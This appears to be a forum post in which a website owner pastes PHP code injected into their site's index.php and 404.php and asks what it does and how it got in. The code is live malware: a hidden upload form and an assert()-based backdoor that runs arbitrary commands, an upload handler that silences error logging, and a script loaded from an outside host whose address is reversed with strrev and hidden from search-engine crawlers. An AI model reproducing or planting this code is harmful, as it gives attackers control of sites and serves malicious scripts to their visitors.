Here is the code injected to index.php
if(@isset($_GET[bots])){
echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">';
echo '<input type="file" name="file"><input name="golden" type="submit" id="golden" value="Done"></form>';
if($_POST['golden']=="Done"){
if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){
echo'+';
}else{
echo'-';
}
}
}elseif(isset($_REQUEST['bot']))assert(stripslashes($_REQUEST[bot]));
else exit;
and here is the code injected to 404.php:
@ini_set('display_errors','off');
@ini_set('log_errors',0);
@ini_set('error_log',NULL); error_reporting(0);
@ini_set('set_time_limit',0);
ignore_user_abort(true);
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
@ini_set('upload_max_filesize','1000000');
$size=$_POST['size'];
$open_image=$_FILES['img']['name'];
$open_image_tmp=$_FILES['img']['tmp_name'];
$image_tmp=$size.$open_image;
@move_uploaded_file($open_image_tmp,$image_tmp);
echo "<!-- 404-NOT-FOUND-IMG -->";
} else echo "<!-- 404-NOT-FOUND-ERROR -->";
$http_report_user = $_SERVER['HTTP_USER_AGENT'];
if ( @stripos ( $http_report_user, 'bot' ) == false and @stripos ( $http_report_user, 'google' ) == false and @stripos ( $http_report_user, 'yandex' ) == false and @stripos ( $http_report_user, 'slurp' ) == false and @stripos ( $http_report_user, 'yahoo' ) == false and @stripos ( $http_report_user, 'msn' ) == false and @stripos ( $http_report_user, 'bing' ) == false ) {
$http_report = strtolower ( $_SERVER['HTTP_HOST'] );
$wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
$not_found_report = strrev ('=drowyek&');
$not_found_page=str_ireplace('/','',$_SERVER['REQUEST_URI']);
$not_found_page=str_ireplace('-',' ',$not_found_page);
echo '<nofollow><noindex><script src="'.$wordpress_report.$http_report.$not_found_report.$not_found_page.'"></script></noindex></nofollow>';
}?>
Please help me find where it started or the backdoor used to inject such malicious code. Also, can somebody tell me what that code does?